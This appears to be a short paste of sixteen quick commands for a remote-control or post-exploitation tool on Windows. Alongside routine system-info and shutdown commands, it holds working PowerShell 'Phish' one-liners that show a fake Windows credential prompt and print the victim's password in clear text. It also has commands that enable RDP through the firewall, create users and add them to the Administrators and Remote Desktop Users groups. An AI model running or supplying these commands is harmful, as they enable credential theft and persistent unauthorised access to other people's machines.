ezcmds 1.6 KB

12345678910111213141516
  1. Send File:C:\Temp\
  2. Install Cert:powershell "Import-Certificate -FilePath $cert -CertStoreLocation $store"
  3. Get PS Version:powershell "$PSVersionTable"
  4. Get SysInfo:powershell "gwmi Win32_QuickFixEngineering | Select Description, HotFixID, InstalledBy, InstalledOn; gwmi Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, BootDevice, BuildNumber, CSName, CSDVersion, NumberOfUsers, Version | FL"
  5. Windows PSv3+ Phish:powershell "Get-Credential -User $(whoami).Split('\')[1] -Message 'Windows requires your credentials to continue' | % {Write-Host $_.UserName '->' $_.GetNetworkCredential().password}"
  6. Windows PSv2- Phish:powershell "Get-Credential | % {Write-Host $_.UserName '->' $_.GetNetworkCredential().password}"
  7. Windows Alert:powershell "[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('Message', 'Title')"
  8. Logoff User:shutdown /l
  9. Restart:powershell "Restart-Computer"
  10. Shutdown:powershell "Stop-Computer"
  11. Add User:net user <USER> <PASSWORD> /ADD
  12. Change User Password:net user <USER> <PASSWORD>
  13. Delete User:net user <USER> /DELETE
  14. Enable RDP:powershell "$key='HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'; if (!(Test-Path $key)) { New-Item -Path $key -Force | Out-Null }; New-ItemProperty -Path $key -Name 'fDenyTSConnections' -PropertyType 'DWORD' -Value 0 -Force | Out-Null; netsh advfirewall firewall set rule group='remote desktop' new enable=yes"
  15. Add User to Remote Desktop Users Group:net localgroup "Remote Desktop Users" /ADD "<user>"
  16. Add User to Administrators Group:net localgroup "Administrators" /ADD "<user>"